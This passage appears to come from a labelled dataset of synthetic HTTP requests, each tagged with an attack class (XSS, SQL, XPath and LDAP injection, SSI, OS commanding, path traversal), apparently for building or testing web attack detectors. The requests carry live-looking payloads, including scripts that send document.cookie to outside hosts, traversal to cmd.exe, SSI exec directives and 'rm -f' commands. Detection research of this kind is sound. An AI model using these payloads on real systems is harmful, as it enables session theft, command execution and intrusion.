ETag: W/"QJQjrAZViFkDgz2hkW"
Expect: 100-continue
From: enlbuaah@iDob1m.fr
If-Modified-Since: Fri, 04 Apr 08 13:20:17 GMT
If-Unmodified-Since: Wed, 12 Dec 07 03:25:41 GMT
If-Match: "cxlhbw7Kf3x.fkR4"
If-None-Match: *
If-Range: Sun, 09 Apr 06 07:14:00 CET
Max-Forwards: 46
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZVN1NnFuZGx2cmVvNWNoZHRzaXRrZHNxZmVOdGVodGFnbjJlMnNjb3I=
Range: 537-
Referer: http://ceaed.cz/lhcterh.conf
TE: trailers
Trailer: Authorization
User-Agent: ent3S/2.1
UA-CPU: StrongARM
UA-Disp: 5571,966,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: kont/4.7 183.243.55.235, 5.5 218.247.153.61, 2.9 www.rawiMqmE.css
Transfer-Encoding: identity
Upgrade: olC/3.6, enno3a/9.1, rEwh/3.6, uetIa/1.1
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 475701883207700445
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41626
Start - Id: 37470
class: LdapInjection
GET /Olocationdelete3mG0HE/e4ocid/eBqNHdw/x2ot_5Ohttpsm/hsbin6perl-gHxxterm6bq/1mmr4e9xe5e/2PSkV1Oy3wEFa/7En/nvZ_v6Arb/i2nVna5eG04nwe/ldrit.sh?s0caEwipschsicn=0tTio3eesa5n8ie&eteGt=bhbvls HTTP/1.0
Host: 212.34.142.103
Connection: keep-alive
Accept: application/x-tar;q=0.6, audio/*, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 49.91.185.115
Cookie: qftpf2Jxmlv=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="108"
Date: Sun, 28 Jun 09 08:42:57 CET
ETag: W/"k6RMyzULIpu1tFmp1Qg"
Expect: 4winmrH=aetamaw;qjoolri3=eirho
From: eeLltA@an2loosG3c.be
If-Modified-Since: Wed, 08 Apr 09 05:27:37 CET
If-Unmodified-Since: Mon, 26 Apr 04 12:24:19 UTC
If-Match: *
If-None-Match: "R4-7vunUtGatLwaHl"
If-Range: Tue, 26 May 09 24:16:31 GMT
Max-Forwards: 84
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: ocusO id7he=kNm0
Authorization: NTLM c25oZXJkVHN4aThzZXNvY2Rhc291RWxlcmFzZW12dDFpeUllaGRIcg==
Range: 2-927066
Referer: /a8le/mbicwt.mpg
TE: chunked
Trailer: Accept-Encoding
User-Agent: hHasAinadotar
UA-CPU: x86
UA-OS: Win9x
UA-Pixels: 3899x9928
Via: HTTP/0.2 www.qetxdc.jpeg, HTTP/2.8 www.ie0mh.htm, sRss/1.9 www.noln.tiff:52612
Transfer-Encoding: aon53o
Upgrade: ao4m/6.0, C0nat/7.0, eej/1.7, alttoo/8.0, rDeils/0.6
Warning: 121 www.ltmnic5r.png "nndoirfvI1nlN" "Wed, 21 Sep 05 18:59:13 CET"
X-Forwarded-For: 32.15.213.191
X-Serial-Number: 9576766349708862183
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37470
Start - Id: 47563
class: XSS
GET /4tteOsiwM/aru-e7jjFrjumUsHOe/uukhnoe3wsig/r206zGKPWcA/e8TknsD6.A/70WH/tLyw7tclv/urswOf1.jpeg?atRcl=569&jtslc=43&CKlT9c=sdr&y9=%290ynipositionnycwherefmailtt&nki=8%7CAcagctm&qrEvrro=%3Cform%2Bname%3Dn5t%3E%3Cselect%2Bname%3Dnt++++%3Ehttp%3A%2F%2Fwww.mrmd.com%2FasIV%2F%3F%3C%2Fselect%3E%3C%2Fform+%3E&yraab=2ssubXMP&onwhu1oeDrDln=n9A&y56H=1782808&aa=tucT_G%40oPVo&Qd0ep=37268&gsey=eavrho HTTP/1.1
Host: 27.241.255.235
Connection: close
Accept: audio/*;q=0.1, image/*
Accept-Charset: windows-1255, euc-cn;q=0.7, cp-936, x-mac-chinesetrad, iso-8859-7
Accept-Encoding: *
Accept-Language: m-6eoscl4, n-M;q=0.7, bre-nde4dt;q=0.6, lenH2v-rsnne3aw;q=0.5, cycntlaw-tm;q=0.0
Cache-Control: no-cache
Client-ip: 19.138.115.203
Cookie: ipaln=zeF75;etiiqSe4osjv=oi4;olspha2tHes=0dine
Cookie2: $Version="143"
Date: Wed, 07 Feb 07 07:32:38 UTC
ETag: "JI9Pavis6Uc7TXF"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Sun, 02 Nov 08 16:41:41 CET
If-Unmodified-Since: Sat, 24 Mar 07 15:43:03 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 23 May 07 03:52:07 CET
Max-Forwards: 5604
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: Digest nonce
Range: 946-214738,54330-8
Referer: http://Lctddati.com/gnye8uos/pesoe/arwslnt.jpeg
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: toeraahogy (tZ3QgH9R; uF0JIxcB; u@_FZ6; rf-xZBIv)
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 417x368
Via: 1.4 210.39.174.128:812, 3.6 www.lget.htm:842, iass/5.8 www.nenthgs4.css:94
Transfer-Encoding: deflate
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47563
Start - Id: 40653
class: SSI
GET /5n5hs20/5VFNU./hgosyattoytfl/tiabooAirigd/DJ@GTXjcscript0aDO-y/d9tZWH3ELXIYb7KNxG.jpg?VmIa=qanstOs&edj4Sdqrt2hd=n9KAYCMoLg&zCgQz4im=aaett&ip=9719&hAmzY047_4I=05115294&sobe9w=96&vjXB=teT&OB43Vu4=%24unEe&posr1=97126892&40nswer9un=+J91iHa&lltchtS1=%3C%21--+++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&i2njsmeesqi=53&saEtrjmeah=dlhomeyeran HTTP/1.0
Host: www.sLnae.fr
Connection: hsrhou
Accept: image/png, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 216.228.245.106
Cookie: ewe=lsm]w$ilAu r
Cookie2: $Version="96"
Date: Thu, 22 Feb 07 21:30:31 CET
ETag: W/"WdX6vTlSThsxbmu"
Expect: 100-continue
From: Doem@euee.uk
If-Modified-Since: Thu, 23 Oct 08 15:30:02 CET
If-Unmodified-Since: Fri, 17 Aug 07 19:57:52 CET
If-Match: "OtIahhw_1X4Y.m.yasGa"
If-None-Match: "tCH68Sc4-aUe7QgHStpb"
If-Range: "cau36TauTTz5B_95Yt2k"
Max-Forwards: 0
MIME-Version: 9.9
Pragma: nwrgu9rs=tSesokoc
Proxy-Authorization: Digest algorithm=o7p4dt7s
Authorization: Basic dGxyaWloaTo4ZWVo
Range: 304-328185
Referer: http://13Pw.de/netgueoa/1dle1v/srca8Sli/dntsdo.sh
TE: chunked;q=0.5
Trailer: Host
User-Agent: wenss/0.4
UA-CPU: PowerPC
UA-Disp: 1159,7674,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 951x487
Via: eeoont/3.7 www.aathsh.js, HTTP/2.2 www.l7gslm.gif, 5.4 187.190.164.99
Transfer-Encoding: gzip
Upgrade: ono/2.9, rvsstr/4.3, n2s/4.0, roa/8.5
Warning: 381 www.ehdcewa.js "Od6ygEdahSe9" 
X-Forwarded-For: 12.148.180.245
X-Serial-Number: 552421
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40653
Start - Id: 44411
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.rtdtdre.st
Connection: close
Accept: video/quicktime;q=0.7, image/*;q=0.4
Accept-Charset: iso-8859-2;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: ltafwiy-Owt, NneAuh-ww;q=0.4, eatexe-wsireul
Cache-Control: bta9m=nx
Client-ip: 136.18.89.145
Cookie: ssbmna=5
Cookie2: $Version="45"
Date: Sat, 28 May 05 16:23:40 GMT
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: qeSl8a=erci;preie
From: on76@weg6se.uk
If-Modified-Since: Thu, 12 Mar 09 09:32:12 GMT
If-Unmodified-Since: Sat, 27 May 06 04:28:22 CET
If-Match: "2uzo5FNbXbBlmlGRD"
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: Sat, 26 Mar 05 19:05:28 UTC
Max-Forwards: 4262
MIME-Version: 6.5
Pragma: dml='wra0ir1p'
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: oigi5 uil1eat=nanstcl
Range: 277921-3,-74088
Referer: http://www.frwl.it/tHdlganu/aafiia.exe
TE: gzip
Trailer: Warning
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 5.8; Bk-ve; rv:9.9.4) Gecko/50181886
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6396x837
Via: ljf/1.1 85.131.140.65, HTTP/6.1 www.8oro.gif
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 207.201.80.136
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44411
Start - Id: 49797
class: XPathInjection
GET /eaXn.htm?et=%2B-+Aa&telcza5x=eladmingyctN5e+sh0drgps&Nsus=65631878&p2yMPT=404+or++enafn3%2FOiwtee%2Foqrlco%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D++++or++++3656%3D&V@nodeiirboEjJS=rpt%29%5C&teh=2t%2Blosg&ielhkkmsh4tio=agpwziD5.C&e5=+nodewfy%29os&fg3evaie=6&ris8bnt=K7kh0&aiiRtestsetda=4544952280&0afetjthale=0804657 HTTP/1.1
Host: www.Tp0d9d.uk:80
Connection: keep-alive
Accept: image/gif
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.2, deflate;q=0.7, identity, compress, deflate;q=0.1
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 41.236.97.233
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="493"
Date: Mon, 19 Mar 07 14:52:37 UTC
ETag: "G2lvDzt3GUzDs0U4"
Expect: 100-continue
From: ic2oxryy@hens5ahgle.org
If-Modified-Since: Thu, 03 Feb 05 08:39:33 GMT
If-Unmodified-Since: Sun, 05 Nov 06 15:18:36 GMT
If-Match: "MGvZloleqbJVH-JWi"
If-None-Match: "pGRGra8HOg7T2Qr2"
If-Range: Tue, 23 Nov 04 09:07:23 GMT
Max-Forwards: 68
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 1-,586-,-3399
Referer: http://cecawzn.ch/ngttooe/kwikel/aymris9/itReyil/9tocnrEG.exe
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.0 (compatible; drHotdo; Open BSD i586; I07wcet)
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 742x2872
Via: 3.9 www.oSoneef.jpeg, FTP/4.6 www.osmyun.css:506, rom/1.8 138.72.82.19:74
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 972 67.57.148.71 "btc9redfdijsq0" 
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 09611302404410791541
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49797
Start - Id: 45432
class: PathTransversal
POST /QinMedivY/7Csowr/eeeeoeredsG0/oBmgTU/na0tw/WOWU3Pf@sI/-FmpTgchildVTSF/vxM/9aIGDCGcfU_n..exe? HTTP/1.0
Content-Length: 277
Content-Language: a3idei,qlea3
Content-Encoding: identity
Content-Location: http://onei.com/iwmtj.mdb
Content-MD5: NW9ldXN0bzRzZ25hYXBwMw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 12:14:36 CET
Last-Modified: Sat, 04 Mar 06 21:02:55 UTC
Host: 32.191.28.180:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-1, shift_jis;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 127.38.121.80
Cookie: bnaaoUaqt3jne9=nziaun0qtr61;esfnitdiU=07
Cookie2: $Version="00"
Date: Tue, 24 Jun 08 24:58:30 UTC
ETag: "0EhvIuiP_jDS20ntRRir"
Expect: nHenleg
From: d1Subs@Oaeelb.fr
If-Modified-Since: Thu, 16 Feb 06 10:25:30 UTC
If-Unmodified-Since: Sun, 23 Aug 09 08:05:41 GMT
If-Match: "pqBflgYPsq09-3HXqT"
If-None-Match: "vGKoP1yRRdXDmWp9Z"
If-Range: "GSCfKCXE0ARYEh7AN"
Max-Forwards: 4978
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest username="aierso"
Authorization: CoaBs wI9kr4h=endwLvw
Range: -292636,082693-
Referer: /hdsli/eimn/3iele.jpeg
TE: deflate,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.6 (Windows; U; WinNT 0.7; iI-fy; rv:2.2.1) Gecko/58044063
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 357x895
Via: HTTP/8.9 245.103.187.32, 4.5 www.Bhea.tiff
Transfer-Encoding: compress
Upgrade: dtOesl/5.5, bnmms/6.9, ehjAL/3.5, hrt/2.4
Warning: 027 www.80Tmnqe.tiff "nrptaalt484raSb7" 
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sogphnpi2edohih=..........................WINNTsystem.ini&TyJe=<pd5do&fnetcatWAORWXp=99&dtSit4ceemeNE=752903937&q6S6nrahec0=da&o7xqzddl8e=07745&h9eezo=ssylhhAadxe&haioWaorrEtt=r8tt&nmul5dfsiar6t=jt4NYti&ep=837&odt7cnenmNo3lz=apilyWwszv&e1cnarfewb=eMps2w.V&taletn=o0&nc=h%0e

End - Id: 45432
Start - Id: 48695
class: XPathInjection
POST /sre12cinid/nmax4NG/7Yi0Mxowv1zTS/qxu.krd-2usrL4B0/d8818tEByrbDXo/easrlnl/iVyWGKb-vsSC/lW.sVkwP.rz-NMQ.cgi? HTTP/1.0
Content-Length: 202
Content-Language: hcetf9s
Content-Encoding: compress
Content-Location: http://gfhuej.fr/utlh/oeotere/naoa/aaEsh/rebhos1.dll
Content-MD5: bllrcmVSbDJvYWxlaDJpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 10:09:36 CET
Last-Modified: Fri, 25 Jan 08 07:19:59 CET
Host: 178.169.196.75
Connection: close
Accept: image/jpeg
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: vecfNo-eefhits;q=0.5
Cache-Control: no-transform
Client-ip: 140.188.172.60
Cookie: ekciECSecopyDY=14955;srUleodueoo=55;tpSeenetcliG=ps';airaaocitpWtwn=twnse4;ntatGv=eWOcJ;JdivXVuRA=92921
Cookie2: $Version="590"
Date: Fri, 26 Mar 04 12:31:51 CET
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oiaydiik=Cesre;ani7=heeoad
From: i1istd@23tm.net
If-Modified-Since: Sat, 18 Feb 06 11:23:30 UTC
If-Unmodified-Since: Mon, 05 Jan 04 13:43:02 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Dec 07 01:52:26 GMT
Max-Forwards: 743
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: Basic SXR2dTp1bkljZGE=
Range: 569156-2482
Referer: http://ipuf.gov/eTaHsh/s4ni0cnh/scedawsd/AtnY.tiff
TE: gzip,trailers,trailers
Trailer: Expect
User-Agent: aOodhfe/1.1
UA-Disp: 527,267,32
UA-Color: color8
UA-Pixels: 640x9904
Via: 5.2 96.130.108.219, 4.0 230.93.196.168:3142, fT9/2.1 www.tuyssr.htm
Transfer-Encoding: gzip
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 243.139.91.251
X-Serial-Number: 3185085450816900238
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N6O4T@L4Ha=uae3b&access_logHWp0aHfVlocationJQ=b-A-Nu2b&ScatUhO=yxil&S20M47=riae'    or  1<     bern/6aanr/atpgn/child::text()[position()=638]   or     'd0aoab2f' =  '

End - Id: 48695
Start - Id: 46966
class: XSS
GET /dNK4DG/etS6QHghZg-2-xoa/mIc/dh3ccsrptn2ymNmnn/eyesazDg6eIvd9aeess/nofin7/tc6o0Ernaef/s-1wN/x8Ov@gTTf90Oa.nsf?wHensbatitee8n=%26%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F214.52.214.233%2Fseisle.pl%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E HTTP/1.0
Host: www.7ilLEam1w.st
Connection: nhreN4
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp;q=0.0, macintosh, windows-1251, hz-gb-2312;q=0.9
Accept-Encoding: 
Accept-Language: aypasics-frca, 4hh7wa-ad;q=0.6, cm-d;q=0.2, gadasn7-w
Cache-Control: only-if-cached
Client-ip: 62.241.33.36
Date: Thu, 14 Dec 06 10:36:58 UTC
If-Modified-Since: Tue, 21 Feb 06 22:24:34 GMT
If-Unmodified-Since: Wed, 27 May 09 09:20:28 UTC
If-Match: *
Referer: /lis4/rorTdlw/ctSres/aD8nhi.png
User-Agent: eh6bai
Warning: 584 191.35.115.79 "1qlspapa9ees2tn" "Sat, 15 Aug 09 01:47:46 UTC"

null

End - Id: 46966
Start - Id: 36386
class: OsCommanding
GET /aan0opptmz/en9as0oYeseye/M4aL1rmIPa.wPL/tdlioytmlt5RIea/bjwfrIvSKi4RHGRZBV/8dbSf/ngTyJadogy/er/afoh7nesoo/e0R37divizDrU2homeP6/aHCrgqGE.l/yx5nDFqS5gva6koAN84.dll?5ctyooqbaudx3=slZ&Pelib3updateb=E&5ee=pig.5fDp1Odz&iIHseemsid=%3C%21--+++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5CtIn%5Cfoeeeso4rh%5C8ee8kghd.exe+++++d%3A%5CroEthd%5Cwww.etiese.org%5Cwoa%5Cdatabase.mdb+++%2Fx++++exporttofoxpro%22--%3E&ed6nt=Eiauodocument0&.dDu_eMbLf=ekob&hs=xefer6ew0ndaavja HTTP/1.1
Host: 250.189.45.210
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: Higt-ee;q=0.0, telg-djttlre, rn-97l, wck-I8;q=0.4, axTNe-ciuz;q=0.4
Cookie: cnhciae=rbb3YwLR;sh6ylte7stebtlz=svopeni;fwDuon=oreo
Cookie2: $Version="90"
Date: Mon, 30 May 05 11:58:17 UTC
ETag: "Y_FanZdQrXrmiFy"
If-Modified-Since: Sat, 28 May 05 22:56:54 GMT
If-Match: "KQIx-DOjTgMNU5i"
If-None-Match: *
Max-Forwards: 7
Authorization: Basic aWExbm5OZjpsZWxm
Referer: /Asii/ehiel/cuEfe/trglrG.nsf
TE: trailers
User-Agent: eRaeer42m
UA-Color: color8
UA-Pixels: 4806x485
Via: FTP/7.8 www.pnfraEI.shtml, Selxa/8.5 www.si5hcijr.html, HTTP/7.2 www.hmi2Vd.js
Transfer-Encoding: dira
----: ------------------------------

null

End - Id: 36386
Start - Id: 43077
class: OsCommanding
PUT /luaQvrtnyobyaa2o/3nnhlidtdNt3s/ee1ssepmm/MaKF/fx8wGH_VoXD/eeKqs3ie0.htm? HTTP/1.0
Content-Length: 45
Content-Language: gef,orhw1nl
Content-Encoding: compress
Content-Location: http://srntie.st/ATe9a/5eq2lEli/5moccaji/n8n0equ/deee2Ar.pl
Content-MD5: cUR2bmVudXJlb2h2bktkQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 May 05 24:17:51 CET
Host: www.hhOth.gov
Connection: close
Accept: audio/*;q=0.5
Accept-Charset: hz-gb-2312, x-mac-roman;q=0.6, iso-8859-6;q=0.4, windows-1251, x-mac-hebrew;q=0.5
Accept-Encoding: gzip, identity, compress, identity;q=0.3
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 56.53.104.65
Cookie: Vopeninput-lkK29=6138549;F0u3ifnqe=qewinntDe(a;osaosNttb9l=eiftutrfhno;awto3unals=hexcgttbodyiO
Cookie2: $Version="0"
Date: Sun, 13 May 07 07:03:43 CET
ETag: W/"eMtiP-Ze0_ie0Pb27"
Expect: 100-continue
From: gweat@cOEisd.cz
If-Modified-Since: Sat, 05 Nov 05 05:24:27 CET
If-None-Match: "z-v_VeDmzp2WdrNt"
If-Range: "evnKTBNdJ-xv1QE"
Max-Forwards: 4
Pragma: no-cache
Range: 6369-838,-3833
Referer: /yi9tdao/te5ss1/Gzts/Tape/ryee.swf
User-Agent: 1e7anxvbdg (s@kwUeKQit; lXXHH3I@; eGo00Ui1; nYFjT_xKo)
UA-OS: Win98
Via: 5.0 252.139.235.151, HTTP/4.9 20.2.70.154
Transfer-Encoding: identity
~~~~~: ~~~~~~~~~~~~~~~

aewr=rm  -f    /tmp/pA  |&nisnd=tsoo8et

End - Id: 43077
Start - Id: 41306
class: SqlInjection
GET /elZtYM/telnetT@0j8@H5Xp5/oh/lnodsiojslnbHstgNrso/ociintetno/09ows9iAene4E7dorx/2Mtq4DBTb.1Ghome1/R0HzFOvxml1Cq3hx2/htRieaS3ot11.shtml?ee2m=le8ok5elsg&rssXa2dteanrse=tOiiueopC6&0a5hutoe=isipS%25&sialcbhtlssy5=dooa+oisdN&tik=3185227433&e7hwainUfoaEt=tfd3khtlayA&f7fy=he%24dl%40jtecwu&Or=5&mpri9ksuA=esfrsyCe&aa=bHg_9Ma HTTP/1.1
Host: www.ecAdl.net:80
Connection: oiinaoje
Accept: */*
Accept-Charset: windows-1253;q=0.4, iso-2022-jp;q=0.4, cp-936, windows-1257
Accept-Encoding: identity;q=0.2, compress;q=0.1, compress
Accept-Language: ete2ieA-Bxpate
Cache-Control: no-cache
Client-ip: 121.1.44.70
Cookie: abha3T=htaOtstncrr;tw75s=ehSpnit0iframey;9-@rFJq=' OR ''    =   ';rfuuEevalFOn=ak5(xformiwp-inxterm;aol=fOi1onRe2httDs
Cookie2: $Version="17"
Date: Sat, 29 Jan 05 21:23:03 GMT
ETag: "XnAO-WJ5r2AuMoRrc"
Expect: 100-continue
From: mdosno@ma4t.gov
If-Modified-Since: Fri, 20 Jun 08 04:54:57 GMT
If-Unmodified-Since: Fri, 22 Oct 04 13:30:12 CET
If-Match: *
If-None-Match: "okUQTbEI33Ovo7nEhW"
If-Range: *
Max-Forwards: 810
MIME-Version: 0.5
Pragma: 08un5atu=spDti
Proxy-Authorization: rtil dsNht=zY5a
Authorization: uhtg ihomrOol=e8teiO3
Range: 536989-,435785-66,662-
Referer: http://zahnh0s.ch/8sedl/eoheMr/qeeiee/9etp/maou9hrO.zip
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: mr8nestomreA
UA-CPU: 68000
UA-Disp: 164,837,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 470x0638
Via: anlcab/5.8 www.wqneteGJ.jpg:6486, FTP/1.3 www.mhamd.png, hmtmLr/2.8 www.em9X.html
Transfer-Encoding: M91K
Upgrade: socrc/1.5, hIo/9.2
Warning: 387 186.147.86.32 "h3ea5eriueh" 
X-Forwarded-For: 5.238.202.67
X-Serial-Number: 670048221
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41306
Start - Id: 47827
class: XSS
GET /rk60wj_fe3MbaLx4473/nlOdu4/qj/dt996etuucocwyot7a/a4Z@P5W8dm/Enhteia/aq/iCkON2pSurnX0Euw4.N/6wO9-mX/tren.dll?XqO4wfJ5CV%u.=551222&Scmch9=nulll&ttds5iHflaeildi=eee7n1ti3&isAdoeoisteqe=Umbstdinhio+P&UlikemochapZmailI0N_@=140394&ij4ksr8GljioM=%3Ca++href%3D%22++javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.tretti.com%2Fcgi-bin%2Frodeiclell.cgi%27%2Bdocument.cookie%29%3B%5D%22+++%3E&lctaml=2ac&cIjo4f=it&jad=636362492&ace7Sltgey=e%3Cje&lfun=R&ua=2fVJLM5SP&tamdhriyiooblgw=of%27sp%3Bmailsg%29st+2i HTTP/1.1
Host: 92.71.133.110:80
Connection: close
Accept: */*
Accept-Charset: macintosh, euc-tw;q=0.1, iso-2022-jp;q=0.5, windows-1252
Accept-Encoding: *;q=0.9
Accept-Language: fefe-ht3riqte;q=0.8, geage8-weieusyi, EoaEedt-gzYhnzy5
Cache-Control: max-stale=8585
Client-ip: 106.65.144.196
Cookie: dmMs4=ydrophduTsylts1\g;iieItinrdtohds=sene;lM=615410;ssigotaocae9=naa
Cookie2: $Version="3"
Date: Fri, 11 Dec 09 19:38:14 CET
ETag: W/"OurwtpibD7A0noXC"
Expect: nets3L
From: esal@nqcagsropr.fr
If-Modified-Since: Mon, 12 Apr 04 06:15:52 CET
If-Unmodified-Since: Fri, 08 Dec 06 24:56:16 GMT
If-Match: "Hhh@qIhf8nia.DsVqUWI"
If-None-Match: "S9oeIH9gEf161H5ZS0wz"
If-Range: Sun, 05 Apr 09 17:10:34 CET
Max-Forwards: 0025
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: Basic eW91c2VpZTp0bnh2dGQycw==
Range: 44-,80-
Referer: /iEuiu.gif
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: riue/9.8
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 907x206
Via: 6.4 50.250.40.242:5395
Transfer-Encoding: gzip
Upgrade: liEh/2.4, ahen5/4.1
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 4290166735414174
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47827
Start - Id: 47353
class: XSS
GET /oO/eu7pohuRtarbuew/iKV9ZCAazJ84P9gsy.gif?trtEce66ti5od=%3Ca+++++href%3D++++%22about%3A%3Cs%26%2399%3Bript+++%3E%5Bwindow.open%28%27http%3A%2F%2F174.2.169.1%2Fnene.pl%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E+%22+%3E&il8lo0e0gs=iSrreplacesjcM%27&ebeaood=eM&Seo9rDIetf=Econnectg&edHpstdee=15356946&ougnia0aa=nbetween01onodeEea&iTef=%260&ueIAntefsars=96994 HTTP/1.0
Host: 215.178.123.189
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-korean;q=0.2, x-mac-cyrillic;q=0.6, x-mac-chinesetrad;q=0.2, x-mac-hebrew;q=0.3, x-mac-arabic;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: e3-U, ldieyN-treta0aL;q=0.5, oLtepehy-aod
Cache-Control: max-age=09
Client-ip: 158.76.70.248
Cookie: ros=gam;ne5yet=wYasTKE.YeW;e7tIlsie=$hwindow.opents?bbctrconnecta 5(d
Cookie2: $Version="15"
Date: Sat, 30 Aug 08 07:41:56 UTC
ETag: "mIzAAV5Ptg5ejv@T"
Expect: gehsh=hohaf
From: hrsita@gtnEqlet.org
If-Modified-Since: Wed, 09 Nov 05 06:42:29 CET
If-Unmodified-Since: Sun, 08 Jun 08 01:20:35 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Oct 08 09:38:51 GMT
Max-Forwards: 1380
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM dHphWjZucnRldWFnZ1BpemFucm9kbXJlbmR0bGYxaGhkcjI=
Authorization: tzlma dsiixmto=lersh
Range: -066761,152-
Referer: /eehai4/Wuteq/SOaSty9v/peeimtt/noemd.conf
TE: deflate
Trailer: Trailer
User-Agent: g4naCxf5r (pXP.HH.; islQR-; oZlIVg; eu11E9)
UA-CPU: MIPS
UA-Disp: 2126,5333,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 781x9042
Via: emor/0.7 www.Cninesed.jpg, 6.3 www.oroh.shtml, 2.6 98.139.179.165
Transfer-Encoding: gzip
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 189 www.heie2TOp.tiff:44669 "batcacSuto0ta" 
